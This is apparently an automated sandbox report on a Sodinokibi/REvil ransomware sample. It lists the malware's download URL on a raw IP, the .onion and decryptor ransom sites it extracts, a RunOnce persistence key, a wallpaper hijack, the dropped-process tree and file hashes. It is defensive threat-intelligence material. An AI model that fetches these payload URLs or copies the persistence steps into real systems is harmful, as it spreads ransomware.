Analysis
-
max time kernel
110s -
max time network
124s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-12-2021 12:45
Static task
static1
URLScan task
urlscan1
Sample
http://65.52.231.153/order.exe
Behavioral task
behavioral1
Sample
http://65.52.231.153/order.exe
Resource
win10-en-20211208
General
-
Target
http://65.52.231.153/order.exe
Malware Config
Extracted
C:\Users\Admin\Desktop\4agrfsh5tx7-HOW-TO-DECRYPT.txt
sodinokibi
http://wwylgcvegp33t2ytnsqa6klroq3kz643q5ceinkqb7x6232g3guit2id.onion
http://decryptor.top/913AED0B5FE1497D
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
order.exeagent.exenet.exenet.exenet.exepid process 1440 order.exe 1760 agent.exe 2868 net.exe 4036 net.exe 2060 net.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
agent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\a8hadofi = "C: \\Users\\Admin\\AppData\\Local\\Temp\\agent.exe" agent.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
agent.exedescription ioc process File opened for modification C:\Users\Admin\Documents\desktop.ini agent.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
agent.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" agent.exe -
Drops file in Windows directory 1 IoCs
Processes:
WerFault.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3832 1760 WerFault.exe agent.exe -
Modifies Control Panel 2 IoCs
Processes:
agent.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\WallpaperStyle = "1" agent.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\TileWallpaper = "0" agent.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 28aae2c489ecd701 iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0b52ed6c3edd701 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d05d20d6c3edd701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8db62ff13956941acf514a4778508d70000000002000000000010660000000100002000000067171ef064a05397f99511fe159333232ca2fee98b2c5b544921cecdb89994e2000000000e800000000200002000000038a9d8dfd786da9f2397b9f929dbf33b4a1f8de9af0b72bcd52ad9eb6ea819f42000000030c9a9bc7aea68db2997328be50a7965bb7d8cf6d563275432e3d22e3ad1ecea400000008caa59d256d8382ee776066fd22d032dc98e688c90a9753c7fcc1219d085b80b4a33ca25352259fc15522d4037ff3bee7b2a16739f3babc5d9d6c729e901a514 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{6A894CDB-3704-4D31-BDA0-513CDFFB02A5}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8db62ff13956941acf514a4778508d700000000020000000000106600000001000020000000ae64999dac8d248cb2b286b1d283bd638ba2178841924ed0975e06ec76cf6f18000000000e8000000002000020000000b0102db5299c7f5c644b2120bace130476a32cf1c4cdff971f0d1ff26c5dfa2b20000000d8ee87a27679ec1e85adc46d55386ed6742564a546ab9f2c198c168d65b47686400000000c3235d8ad61aed2612a53b20d75bc7cf1b001260cd4c8135742089023f98225a0cfd69f40f7c57eaf78e97eb6aa62d12dab0399dd6fce0e8bb3c59d9605b7c5 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7E4CD054-5C12-11EC-9231-46FD2288E782} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
WerFault.exepid process 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
order.exenet.exenet.exenet.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1440 order.exe Token: SeDebugPrivilege 2868 net.exe Token: SeDebugPrivilege 4036 net.exe Token: SeDebugPrivilege 2060 net.exe Token: SeRestorePrivilege 3832 WerFault.exe Token: SeBackupPrivilege 3832 WerFault.exe Token: SeBackupPrivilege 3832 WerFault.exe Token: SeDebugPrivilege 3832 WerFault.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
iexplore.exepid process 2608 iexplore.exe 2608 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 2608 iexplore.exe 2608 iexplore.exe 1304 IEXPLORE.EXE 1304 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
iexplore.exeorder.exeagent.exedescription pid process target process PID 2608 wrote to memory of 1304 2608 iexplore.exe IEXPLORE.EXE PID 2608 wrote to memory of 1304 2608 iexplore.exe IEXPLORE.EXE PID 2608 wrote to memory of 1304 2608 iexplore.exe IEXPLORE.EXE PID 2608 wrote to memory of 1440 2608 iexplore.exe order.exe PID 2608 wrote to memory of 1440 2608 iexplore.exe order.exe PID 2608 wrote to memory of 1440 2608 iexplore.exe order.exe PID 1440 wrote to memory of 1760 1440 order.exe agent.exe PID 1440 wrote to memory of 1760 1440 order.exe agent.exe PID 1440 wrote to memory of 1760 1440 order.exe agent.exe PID 1760 wrote to memory of 2868 1760 agent.exe net.exe PID 1760 wrote to memory of 2868 1760 agent.exe net.exe PID 1760 wrote to memory of 2868 1760 agent.exe net.exe PID 1760 wrote to memory of 4036 1760 agent.exe net.exe PID 1760 wrote to memory of 4036 1760 agent.exe net.exe PID 1760 wrote to memory of 4036 1760 agent.exe net.exe PID 1760 wrote to memory of 2060 1760 agent.exe net.exe PID 1760 wrote to memory of 2060 1760 agent.exe net.exe PID 1760 wrote to memory of 2060 1760 agent.exe net.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://65.52.231.153/order.exe1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2608 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1304 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Users\Admin\AppData\Local\Temp\agent.exe"C:\Users\Admin\AppData\Local\Temp\agent.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\Desktop\net.exe"net.exe" http://65.52.231.153/profile.png4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2868 -
C:\Users\Admin\Desktop\net.exe"net.exe" http://65.52.231.153/profile.png4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4036 -
C:\Users\Admin\Desktop\net.exe"net.exe" http://65.52.231.153/profile.png4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 11204⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\4agrfsh5tx7-HOW-TO-DECRYPT.txt1⤵PID:1980
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\net.exe.logMD5
808e884c00533a9eb0e13e64960d9c3a
SHA1279d05181fc6179a12df1a669ff5d8b64c1380ae
SHA2562f6a0aab99b1c228a6642f44f8992646ce84c5a2b3b9941b6cf1f2badf67bdd6
SHA5129489bdb2ffdfeef3c52edcfe9b34c6688eba53eb86075e0564df1cd474723c86b5b5aedc12df1ff5fc12cf97bd1e3cf9701ff61dc4ce90155d70e9ccfd0fc299
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exeMD5
5b11e8568c32201e9ddb1bdaca1342e5
SHA1bce9d7943d6432a15a728306c9c2b9636ce81ca1
SHA256f9548ec36283b125c1af6f60d8e31a667e5ee59af276e68c9f3f3d4dde4d56b0
SHA5127eab9235edc1370848a46b647566fb740be82fa62888a8d7abe5d37a73e1e09c9f22b5457441d183b398e259661ad976a908af3824bc37dec1e466b87b84eabf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\order.exe.6wpeg6e.partialMD5
5b11e8568c32201e9ddb1bdaca1342e5
SHA1bce9d7943d6432a15a728306c9c2b9636ce81ca1
SHA256f9548ec36283b125c1af6f60d8e31a667e5ee59af276e68c9f3f3d4dde4d56b0
SHA5127eab9235edc1370848a46b647566fb740be82fa62888a8d7abe5d37a73e1e09c9f22b5457441d183b398e259661ad976a908af3824bc37dec1e466b87b84eabf
-
C:\Users\Admin\AppData\Local\Temp\agent.exeMD5
910c4202c3f973a9d8adc77089d72460
SHA11fa3c605134cdafbe2c8499c71f8421e1676e966
SHA256abcf40f700b8b0a974fdb9528b058d7606ae3e1b7c080fb0a08108720e8825f9
SHA512fd30c1e491557ffdf24ab8277e7d613d215fce28f4694e07c9d9b22d3aaeed83d12ef72664c139055a3906640469d90bb5d45d904cbff6373713c524f9d24068
-
C:\Users\Admin\AppData\Local\Temp\agent.exeMD5
910c4202c3f973a9d8adc77089d72460
SHA11fa3c605134cdafbe2c8499c71f8421e1676e966
SHA256abcf40f700b8b0a974fdb9528b058d7606ae3e1b7c080fb0a08108720e8825f9
SHA512fd30c1e491557ffdf24ab8277e7d613d215fce28f4694e07c9d9b22d3aaeed83d12ef72664c139055a3906640469d90bb5d45d904cbff6373713c524f9d24068
-
C:\Users\Admin\Desktop\4agrfsh5tx7-HOW-TO-DECRYPT.txtMD5
637ae544ed099156c54bdd7808e6fa6e
SHA1c32197ff2a28161be705c632b23d6af9ee406ec8
SHA256b7dd502daec43379979dc05746afd3c494fce6d2a558b9eeceaac9c17e16dfc2
SHA51225e5546ace22375265c539f0545b0217438e2d364a03b55de234d034d135964012f7bde81a1dd41725f3f40f2797ff5003da8254cf2ba9369c9f484cbae30dab
-
C:\Users\Admin\Desktop\net.exeMD5
edab8397e652102e581eb1e8d177cc22
SHA18789114cbe937e3d4f1a90e3380177b0015eeef3
SHA256cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7
SHA512f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d
-
C:\Users\Admin\Desktop\net.exeMD5
edab8397e652102e581eb1e8d177cc22
SHA18789114cbe937e3d4f1a90e3380177b0015eeef3
SHA256cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7
SHA512f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d
-
C:\Users\Admin\Desktop\net.exeMD5
edab8397e652102e581eb1e8d177cc22
SHA18789114cbe937e3d4f1a90e3380177b0015eeef3
SHA256cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7
SHA512f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d
-
C:\Users\Admin\Desktop\net.exeMD5
edab8397e652102e581eb1e8d177cc22
SHA18789114cbe937e3d4f1a90e3380177b0015eeef3
SHA256cde0a0cd77ef0e0dd00eacbedc1cba9d203b0841208feb0d5bf7f26e61f7cae7
SHA512f11449e6630baa4456dcc0454d13dddeaa19b09ecab3628a95043093f7e1d682c8cc197f65b9800aeb1f68c8dc41d9406567fe27ef01afd6a5cb84d72c53820d
-
memory/1304-140-0x0000000000000000-mapping.dmp
-
memory/1440-201-0x0000000005410000-0x0000000005411000-memory.dmpFilesize
4KB
-
memory/1440-197-0x0000000000000000-mapping.dmp
-
memory/1760-207-0x0000000004BC0000-0x0000000004BC1000-memory.dmpFilesize
4KB
-
memory/1760-202-0x0000000000000000-mapping.dmp
-
memory/2060-220-0x0000000000000000-mapping.dmp
-
memory/2060-224-0x0000000004CE0000-0x0000000004CE1000-memory.dmpFilesize
4KB
-
memory/2608-134-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-172-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-138-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-136-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-141-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-142-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-144-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-145-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-147-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-149-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-150-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-151-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-155-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-156-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-157-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-163-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-164-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-165-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-166-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-167-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-168-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-137-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-173-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-135-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-115-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-133-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-131-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-129-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-128-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-127-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-124-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-116-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-125-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-123-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-117-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-119-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-122-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-120-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2608-121-0x00007FFE2FA20000-0x00007FFE2FA8B000-memory.dmpFilesize
428KB
-
memory/2868-214-0x0000000004920000-0x0000000004921000-memory.dmpFilesize
4KB
-
memory/2868-209-0x0000000000000000-mapping.dmp
-
memory/4036-219-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/4036-215-0x0000000000000000-mapping.dmp